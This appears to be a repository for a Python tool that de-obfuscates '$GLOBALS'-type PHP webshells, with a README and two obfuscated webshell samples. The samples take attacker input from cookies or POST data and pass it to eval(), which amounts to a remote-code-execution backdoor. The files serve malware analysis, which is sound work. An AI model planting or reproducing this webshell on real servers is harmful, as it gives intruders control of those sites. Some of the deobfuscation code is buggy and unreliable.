├── Alphabet-Key.py
├── Alphabet-Soup.py
├── README.md
├── Sample-$GLOBALS
└── Sample.php


/Alphabet-Key.py:
--------------------------------------------------------------------------------
 1 | ###############################################
 2 | # Version  1                                  #
 3 | # Deobfuscation of numbers: @Iamrasting       #
 4 | #                                             #
 5 | ###############################################
 6 | import re
 7 | 
 8 | #Key
 9 | # PLEASE MAKE SURE THAT ALL HEX CODES ARE CORRECT. IF YOU HAVE ANY ERRORS ADD A 0 , FOR EXAMPLE \xd WILL BE \x0d . There are known occurances.
10 | 
11 | Alphabet=" ENTER ALPHABET HERE "
12 | 
13 | # this is the obfuscated code we need to extract the numbers from
14 | obs = "ENTER TO OBFUSCATED CODE HERE"
15 | 
16 | # This will take all numbers and convert to the correct character.
17 | # It will print to the console the converted code. Please copy this code for further conversion. 
18 | 
19 | # New Code
20 | # ========
21 | 
22 | # First, find all the numbers that are contained within two square brackets
23 | # e.g. the "[62]" in $tf7ebf['l94b537e'][62]
24 | obs_numbers = re.findall(r'\[(\d+)\]', obs)
25 | print "Identified numbers: {obs_numbers}".format(obs_numbers = obs_numbers)
26 | 
27 | # Loop through each number from the previous step, and replace every
28 | # "[{num}]" with the char from the corresponding index in `Alphabet`
29 | 
30 | # As these are string values and not integers, PHP will be expecting them
31 | # to appear in quotation marks, as if you had the value [a] - that would cause
32 | # a syntax error in PHP.
33 | processed_obs = obs
34 | for num in obs_numbers:
35 |   search_for = '[{num}]'.format(num = num)
36 |   replace_with = "['{c}']".format(c = Alphabet[int(num)])
37 |   processed_obs = processed_obs.replace(search_for, replace_with)
38 |   print 'Replaced `{num}` with `{c}`'.format(num = num, c = Alphabet[int(num)])
39 | 
40 | print '------'
41 | print 'Original: {obs}'.format(obs = obs)
42 | print 'Processed: {obs}'.format(obs = processed_obs)
43 | 
44 | search_for2 = '[$GLOBALS[$GLOBALS]]'.format(obs = obs)
45 | replace_with2 = "['{c}']".format(c = '')
46 | processed_obs2 = processed_obs.replace(search_for2, replace_with2)
47 | 
48 | print 'Processed: {obs}'.format(obs = processed_obs2)
49 | 


--------------------------------------------------------------------------------
/Alphabet-Soup.py:
--------------------------------------------------------------------------------
  1 | ###############################################
  2 | # Version  3                                  #
  3 | # Deobfuscation of numbers: @Iamrasting       #
  4 | # Deobfuscation of script: @5w0rdfish         #
  5 | ###############################################
  6 | 
  7 | import re
  8 | 
  9 | #Key
 10 | 
 11 | 
 12 | Alphabet="\x5e\x71\x7c\x43\x7a\x6a\x23\x6d\x26\x2d\x44\x3c\x34\x27\x66\x52\x38\x4a\x29\x6f\x63\x35\x59\x0a\x51\x7e\x22\x3f\x6b\x2c\x65\x68\x61\x37\x4e\x09\x73\x3b\x76\x4d\x42\x7d\x7b\x55\x79\x4b\x56\x39\x2f\x77\x6c\x75\x6e\x2b\x78\x3d\x49\x4c\x24\x62\x21\x46\x31\x3a\x2a\x54\x70\x74\x45\x4f\x47\x64\x28\x5c\x2e\x30\x5d\x5b\x5f\x60\x3e\x67\x53\x32\x36\x69\x40\x5a\x20\x41\x57\x25\x58\x48\x0d\x50\x33\x72"
 13 | # this is the first part of obfuscated code we need to extract the numbers from
 14 | 
 15 | 
 16 | with open('globals.php') as infile:
 17 |     for obs in infile:
 18 |            
 19 | # New Code
 20 | # ========
 21 | # First, find all the numbers that are contained within two square brackets
 22 | # e.g. the "[62]" in $tf7ebf['l94b537e'][62]
 23 |       obs_numbers = re.findall(r'\[(\d+)\]', obs)
 24 |      # print "Identified numbers: {obs_numbers}".format(obs_numbers = obs_numbers)
 25 |   # Loop through each number from the previous step, and replace every
 26 |   # "[{num}]" with the char from the corresponding index in `Alphabet`
 27 |   # As these are string values and not integers, PHP will be expecting them
 28 |   
 29 |       
 30 |       processed_obs = obs
 31 |       for num in obs_numbers:
 32 |         search_for = '[{num}]'.format(num = num)
 33 |         replace_with = "['{c}']".format(c = Alphabet[int(num)])
 34 |         processed_obs = processed_obs.replace(search_for, replace_with)
 35 |       #  print 'Replaced `{num}` with `{c}`'.format(num = num, c = Alphabet[int(num)])
 36 |       print '------'
 37 |       
 38 |       
 39 |       #################################################################
 40 |       
 41 |       #find the variable defined as the Alphabet
 42 |       varName2 = re.findall(r'([\'([a-z]\w+)\'\]', processed_obs) 
 43 |       if len(varName2) > 1:
 44 |             
 45 |         alph = varName2[1]
 46 | 
 47 |       #turn to a string
 48 |       result = " ".join(str(x) for x in alph)
 49 |         
 50 |       print alph 
 51 |       #remove all not required 
 52 | 
 53 |       #return its name
 54 |       print ("#Alphabet " + str(alph))
 55 | 
 56 |       ################################################################     
 57 | 
 58 |       #find the variable defined as $GLOBALS
 59 |       varName = re.findall(r'\$([GLOBALS]\w+)\S\[\'([a-z]\w+)\'\]', processed_obs)
 60 |       #turn to a string
 61 |       result = " ".join(str(x) for x in varName)
 62 |       
 63 |       #remove all not required 
 64 |       bad_chars = [' ', ',','GLOBAL','[', ']','.','\''] 
 65 |       varName = result.translate(None, ''.join(bad_chars)) 
 66 |       #return its name
 67 |       print ("#$GLOBALS " + str(varName))
 68 |       print '------'
 69 |       ################################################################
 70 | 
 71 |     # We are going to remove all $GLOBALS that are not required 
 72 |       s = processed_obs
 73 |       e = {varName : ""}
 74 |       
 75 |       def find_replace_multi(string, dictionary):
 76 |           for item in dictionary.keys():
 77 |               # sub item for item's paired value in string
 78 |               string = re.sub(item, dictionary[item], string)
 79 |               return string
 80 |       string = find_replace_multi(s, e)
 81 | 
 82 |       # We are going to remove all $GLOBALS that are not required 
 83 |       s = string
 84 |       e = {alph : ""}
 85 |       
 86 |       def find_replace_multi(string, dictionary):
 87 |           for item in dictionary.keys():
 88 |               # sub item for item's paired value in string
 89 |               string = re.sub(item, dictionary[item], string)
 90 |               return string
 91 |       string = find_replace_multi(s, e)
 92 |       
 93 |       
 94 |       ##################################################################
 95 |       # We remove any other characters not required
 96 |       bad_chars = ['.','\''] 
 97 |       # Translate these to our blank space     
 98 |       string = string.translate(None, ''.join(bad_chars)) 
 99 |      
100 |       #remove the extra $ signs
101 |       string = re.sub("[(\[\])(\[.\])]", "", string)
102 |       string = re.sub("[.(?<!\$)]", "", string)
103 |      
104 |       #Add new lines and spaces for formatting
105 |       string = re.sub(";", ";\n", string)
106 |       #Add new lines and spaces for formatting
107 |       string = re.sub("global", ";\n", string)
108 |       #Output to file
109 |       f = open("output.txt","a+")
110 |       
111 |      # result = re.sub(r"(.*\w) = chr;", r"varible_1 = chr", string)
112 |       
113 |       print string
114 |       
115 |       
116 |      # print string
117 |       
118 |       f.write(string)
119 |      
120 | f.close() 
121 | infile.close()
122 | print "\n ########################################################################## \n # Please open and view the output.txt, the deobufscated code is in there # \n ##########################################################################"
123 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # PHP-Webshell-DeObfuscator
 2 | 
 3 | A Tool written in Python to help de-obfuscate the $GLOBALS type malware. 
 4 | 
 5 | Will work on malware: hexedglobals.3793 | Kidslug | php.obfuscated! | php.malware.GLOBALS.003 | php.malware.GLOBALS.004
 6 | 
 7 | 
 8 | # How does it work
 9 | The first part of the script will take the alphabet and will match it to the relevant number within the code.
10 | Thanks to @iamrasting for his help on this part.
11 | The remainder of the code will deobfuscate a file entered and produce the file output.txt after it has been processed.
12 | 
13 | ## Instructions:
14 | 
15 | 1. Find the hex alphabet within the code. 
16 | it will look something like this  
17 | ```python
18 | "\x59\x4f\x45\x54\x38\x3a\x23\x30\x24\x40\x3b\x7c\x2f\x37\x66\x42\x09\x35\x72\x43\x0a\x2a\x2e\x4c\x29\x6f\x2d\x53\x4e\x44\x34\x5b\x41\x4a\x33\x74\x68\x76\x4d\x3e\x60\x36\x26\x6b\x67\x56\x20\x32\x7e\x22\x7a\x61\x70\x28\x58\x6a\x27\x57\x71\x39\x25\x51\x46\x7d\x48\x5f\x5e\x73\x0d\x79\x2c\x62\x75\x5a\x78\x21\x2b\x4b\x63\x6c\x31\x50\x3f\x77\x47\x6e\x69\x3c\x64\x49\x6d\x65\x5d\x52\x3d\x5c\x7b\x55"
19 | ```
20 | 2. Copy and paste the alphabet into Alphabet Soup at the top.
21 | 3. Check that all hex characters are formed correctly they should all be in the format \x01
22 | 
23 | Where hex is not formed correctly ie \xd please add a starting 0, otherwise the code will fail.Look out for characters xd x9 and xa which seem to be the ones not correct.
24 | 
25 | TIP - IF YOU WANT NICE LOOKING CODE ON OUTPUT - STICK CODE PRIOR TO PROCESSING THROUGH A PHP FORMATTER
26 | 
27 | 4. Enter the name of the webshell file:
28 | 
29 | ```python
30 | with open('globals.php') as infile:
31 |     for obs in infile:
32 | ```
33 | 5. Run the script 
34 | 6. Open output.txt for your deobfuscated code. 
35 | 
36 | 
37 | DEMO SCRIPT
38 | 
39 | I have experimental code where I have converted some further values in hex to python. https://repl.it/repls/UnlawfulGreatLinks
40 | It is currently in devlopment, but you can insert the file in and hex alphabet and it will print out the file
41 | - Not great formatting currently. This is a step closer to complete automation.
42 | 
43 | 
44 | Enjoy
45 | @5w0rdfish
46 | 


--------------------------------------------------------------------------------
/Sample-$GLOBALS:
--------------------------------------------------------------------------------
 1 | $u9eee3f = 896;
 2 | $GLOBALS['GLOBALS'] = Array();
 3 | global $GLOBALS;
 4 | $GLOBALS = $GLOBALS;
 5 | $ {
 6 |     "\x47\x4c\x4fB\x41\x4c\x53"
 7 | }['l94b537e'] = "\x5e\x71\x7c\x43\x7a\x6a\x23\x6d\x26\x2d\x44\x3c\x34\x27\x66\x52\x38\x4a\x29\x6f\x63\x35\x59\xa\x51\x7e\x22\x3f\x6b\x2c\x65\x68\x61\x37\x4e\x9\x73\x3b\x76\x4d\x42\x7d\x7b\x55\x79\x4b\x56\x39\x2f\x77\x6c\x75\x6e\x2b\x78\x3d\x49\x4c\x24\x62\x21\x46\x31\x3a\x2a\x54\x70\x74\x45\x4f\x47\x64\x28\x5c\x2e\x30\x5d\x5b\x5f\x60\x3e\x67\x53\x32\x36\x69\x40\x5a\x20\x41\x57\x25\x58\x48\xd\x50\x33\x72";
 8 | $GLOBALS[$GLOBALS['l94b537e'][81].$GLOBALS['l94b537e'][96].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][12]] = $GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][31].$GLOBALS['l94b537e'][97];
 9 | $GLOBALS[$GLOBALS['l94b537e'][71].$GLOBALS['l94b537e'][75].$GLOBALS['l94b537e'][71].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][47].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][47]] = $GLOBALS['l94b537e'][19].$GLOBALS['l94b537e'][97].$GLOBALS['l94b537e'][71];
10 | $GLOBALS[$GLOBALS['l94b537e'][38].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][33]] = $GLOBALS['l94b537e'][36].$GLOBALS['l94b537e'][67].$GLOBALS['l94b537e'][97].$GLOBALS['l94b537e'][50].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][52];
11 | $GLOBALS[$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][71].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][75].$GLOBALS['l94b537e'][20]] = $GLOBALS['l94b537e'][85].$GLOBALS['l94b537e'][52].$GLOBALS['l94b537e'][85].$GLOBALS['l94b537e'][78].$GLOBALS['l94b537e'][36].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][67];
12 | $GLOBALS[$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][21]] = $GLOBALS['l94b537e'][36].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][97].$GLOBALS['l94b537e'][85].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][50].$GLOBALS['l94b537e'][85].$GLOBALS['l94b537e'][4].$GLOBALS['l94b537e'][30];
13 | $GLOBALS[$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][21].$GLOBALS['l94b537e'][71]] = $GLOBALS['l94b537e'][66].$GLOBALS['l94b537e'][31].$GLOBALS['l94b537e'][66].$GLOBALS['l94b537e'][38].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][97].$GLOBALS['l94b537e'][36].$GLOBALS['l94b537e'][85].$GLOBALS['l94b537e'][19].$GLOBALS['l94b537e'][52];
14 | $GLOBALS[$GLOBALS['l94b537e'][31].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][84].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][62]] = $GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][52].$GLOBALS['l94b537e'][36].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][97].$GLOBALS['l94b537e'][85].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][50].$GLOBALS['l94b537e'][85].$GLOBALS['l94b537e'][4].$GLOBALS['l94b537e'][30];
15 | $GLOBALS[$GLOBALS['l94b537e'][49].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][33]] = $GLOBALS['l94b537e'][59].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][36].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][84].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][78].$GLOBALS['l94b537e'][71].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][19].$GLOBALS['l94b537e'][71].$GLOBALS['l94b537e'][30];
16 | $GLOBALS[$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][96].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][30]] = $GLOBALS['l94b537e'][36].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][67].$GLOBALS['l94b537e'][78].$GLOBALS['l94b537e'][67].$GLOBALS['l94b537e'][85].$GLOBALS['l94b537e'][7].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][78].$GLOBALS['l94b537e'][50].$GLOBALS['l94b537e'][85].$GLOBALS['l94b537e'][7].$GLOBALS['l94b537e'][85].$GLOBALS['l94b537e'][67];
17 | $GLOBALS[$GLOBALS['l94b537e'][28].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][96].$GLOBALS['l94b537e'][14].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][14]] = $GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][84].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][75].$GLOBALS['l94b537e'][75];
18 | $GLOBALS[$GLOBALS['l94b537e'][19].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][14].$GLOBALS['l94b537e'][47].$GLOBALS['l94b537e'][33]] = $GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][83].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][32];
19 | $GLOBALS[$GLOBALS['l94b537e'][81].$GLOBALS['l94b537e'][59].$GLOBALS['l94b537e'][21].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][83].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][21]] = $_POST;
20 | $GLOBALS[$GLOBALS['l94b537e'][1].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][14].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][21].$GLOBALS['l94b537e'][20]] = $_COOKIE;@
21 | $GLOBALS$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][71].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][75].$GLOBALS['l94b537e'][20];@
22 | $GLOBALS$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][71].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][75].$GLOBALS['l94b537e'][20];@
23 | $GLOBALS$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][71].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][75].$GLOBALS['l94b537e'][20];@
24 | $GLOBALS$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][96].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][30];
25 | $j1cf72 = NULL;
26 | $xefb = NULL;
27 | $GLOBALS[$GLOBALS['l94b537e'][5].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][33]] = $GLOBALS['l94b537e'][96].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][9].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][84].$GLOBALS['l94b537e'][83].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][9].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][9].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][14].$GLOBALS['l94b537e'][59].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][9].$GLOBALS['l94b537e'][47].$GLOBALS['l94b537e'][14].$GLOBALS['l94b537e'][75].$GLOBALS['l94b537e'][83].$GLOBALS['l94b537e'][83].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][96].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][47].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][47];
28 | global$jc17;
29 | 
30 | function c2c1a($j1cf72, $x261be0) {
31 |     global$GLOBALS;
32 |     $xe957e = "";
33 |     for ($a05a = 0; $a05a$GLOBALS['l94b537e'][38].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][33];) {
34 |         for ($q31e1 = 0; $q31e1$GLOBALS['l94b537e'][38].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][33] && $a05a$GLOBALS['l94b537e'][38].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][16].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][33]; $q31e1++, $a05a++) {
35 |             $xe957e. = $GLOBALS$GLOBALS['l94b537e'][81].$GLOBALS['l94b537e'][96].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][12];
36 |         }
37 |     }
38 |     return$xe957e;
39 | }
40 | 
41 | function c476400($j1cf72, $x261be0) {
42 |     global$GLOBALS;
43 |     global$jc17;
44 |     return$GLOBALS$GLOBALS['l94b537e'][19].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][14].$GLOBALS['l94b537e'][47].$GLOBALS['l94b537e'][33];
45 | }
46 | foreach($GLOBALS[$GLOBALS['l94b537e'][1].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][14].$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][21].$GLOBALS['l94b537e'][20]] as$x261be0 => $f5a8) {
47 |     $j1cf72 = $f5a8;
48 |     $xefb = $x261be0;
49 | }
50 | if (!$j1cf72) {
51 |     foreach($GLOBALS[$GLOBALS['l94b537e'][81].$GLOBALS['l94b537e'][59].$GLOBALS['l94b537e'][21].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][83].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][21]] as$x261be0 => $f5a8) {
52 |         $j1cf72 = $f5a8;
53 |         $xefb = $x261be0;
54 |     }
55 | }
56 | $j1cf72 = @$GLOBALS$GLOBALS['l94b537e'][31].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][84].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][62];
57 | if (isset($j1cf72[$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][28]]) && $jc17 == $j1cf72[$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][28]]) {
58 |     if ($j1cf72[$GLOBALS['l94b537e'][32]] == $GLOBALS['l94b537e'][85]) {
59 |         $a05a = Array($GLOBALS['l94b537e'][66].$GLOBALS['l94b537e'][38] => @$GLOBALS$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][21].$GLOBALS['l94b537e'][71], $GLOBALS['l94b537e'][36].$GLOBALS['l94b537e'][38] => $GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][74].$GLOBALS['l94b537e'][75].$GLOBALS['l94b537e'][9].$GLOBALS['l94b537e'][62], );
60 |         echo@ $GLOBALS$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][21];
61 |     }
62 |     elseif($j1cf72[$GLOBALS['l94b537e'][32]] == $GLOBALS['l94b537e'][30]) {
63 |         eval / a684ebc / ($j1cf72[$GLOBALS['l94b537e'][71]]);
64 |     }
65 |     exit();
66 | } ?>
67 | 


--------------------------------------------------------------------------------
/Sample.php:
--------------------------------------------------------------------------------
1 | <?php $u9eee3f = 896;  $GLOBALS['tf7ebf']= Array(); global $tf7ebf; $tf7ebf= $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['l94b537e']="\x5e\x71\x7c\x43\x7a\x6a\x23\x6d\x26\x2d\x44\x3c\x34\x27\x66\x52\x38\x4a\x29\x6f\x63\x35\x59\xa\x51\x7e\x22\x3f\x6b\x2c\x65\x68\x61\x37\x4e\x9\x73\x3b\x76\x4d\x42\x7d\x7b\x55\x79\x4b\x56\x39\x2f\x77\x6c\x75\x6e\x2b\x78\x3d\x49\x4c\x24\x62\x21\x46\x31\x3a\x2a\x54\x70\x74\x45\x4f\x47\x64\x28\x5c\x2e\x30\x5d\x5b\x5f\x60\x3e\x67\x53\x32\x36\x69\x40\x5a\x20\x41\x57\x25\x58\x48\xd\x50\x33\x72";$tf7ebf[$tf7ebf['l94b537e'][81].$tf7ebf['l94b537e'][96].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][12]]=$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][31].$tf7ebf['l94b537e'][97];$tf7ebf[$tf7ebf['l94b537e'][71].$tf7ebf['l94b537e'][75].$tf7ebf['l94b537e'][71].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][47].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][47]]=$tf7ebf['l94b537e'][19].$tf7ebf['l94b537e'][97].$tf7ebf['l94b537e'][71];$tf7ebf[$tf7ebf['l94b537e'][38].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][33]]=$tf7ebf['l94b537e'][36].$tf7ebf['l94b537e'][67].$tf7ebf['l94b537e'][97].$tf7ebf['l94b537e'][50].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][52];$tf7ebf[$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][71].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][75].$tf7ebf['l94b537e'][20]]=$tf7ebf['l94b537e'][85].$tf7ebf['l94b537e'][52].$tf7ebf['l94b537e'][85].$tf7ebf['l94b537e'][78].$tf7ebf['l94b537e'][36].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][67];$tf7ebf[$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][21]]=$tf7ebf['l94b537e'][36].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][97].$tf7ebf['l94b537e'][85].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][50].$tf7ebf['l94b537e'][85].$tf7ebf['l94b537e'][4].$tf7ebf['l94b537e'][30];$tf7ebf[$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][21].$tf7ebf['l94b537e'][71]]=$tf7ebf['l94b537e'][66].$tf7ebf['l94b537e'][31].$tf7ebf['l94b537e'][66].$tf7ebf['l94b537e'][38].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][97].$tf7ebf['l94b537e'][36].$tf7ebf['l94b537e'][85].$tf7ebf['l94b537e'][19].$tf7ebf['l94b537e'][52];$tf7ebf[$tf7ebf['l94b537e'][31].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][84].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][62]]=$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][52].$tf7ebf['l94b537e'][36].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][97].$tf7ebf['l94b537e'][85].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][50].$tf7ebf['l94b537e'][85].$tf7ebf['l94b537e'][4].$tf7ebf['l94b537e'][30];$tf7ebf[$tf7ebf['l94b537e'][49].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][33]]=$tf7ebf['l94b537e'][59].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][36].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][84].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][78].$tf7ebf['l94b537e'][71].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][19].$tf7ebf['l94b537e'][71].$tf7ebf['l94b537e'][30];$tf7ebf[$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][96].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][30]]=$tf7ebf['l94b537e'][36].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][67].$tf7ebf['l94b537e'][78].$tf7ebf['l94b537e'][67].$tf7ebf['l94b537e'][85].$tf7ebf['l94b537e'][7].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][78].$tf7ebf['l94b537e'][50].$tf7ebf['l94b537e'][85].$tf7ebf['l94b537e'][7].$tf7ebf['l94b537e'][85].$tf7ebf['l94b537e'][67];$tf7ebf[$tf7ebf['l94b537e'][28].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][96].$tf7ebf['l94b537e'][14].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][14]]=$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][84].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][75].$tf7ebf['l94b537e'][75];$tf7ebf[$tf7ebf['l94b537e'][19].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][14].$tf7ebf['l94b537e'][47].$tf7ebf['l94b537e'][33]]=$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][83].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][32];$tf7ebf[$tf7ebf['l94b537e'][81].$tf7ebf['l94b537e'][59].$tf7ebf['l94b537e'][21].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][83].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][21]]=$_POST;$tf7ebf[$tf7ebf['l94b537e'][1].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][14].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][21].$tf7ebf['l94b537e'][20]]=$_COOKIE;@$tf7ebf$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][71].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][75].$tf7ebf['l94b537e'][20];@$tf7ebf$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][71].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][75].$tf7ebf['l94b537e'][20];@$tf7ebf$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][71].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][75].$tf7ebf['l94b537e'][20];@$tf7ebf$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][96].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][30];$j1cf72=NULL;$xefb=NULL;$tf7ebf[$tf7ebf['l94b537e'][5].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][33]]=$tf7ebf['l94b537e'][96].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][33].$tf7ebf['l9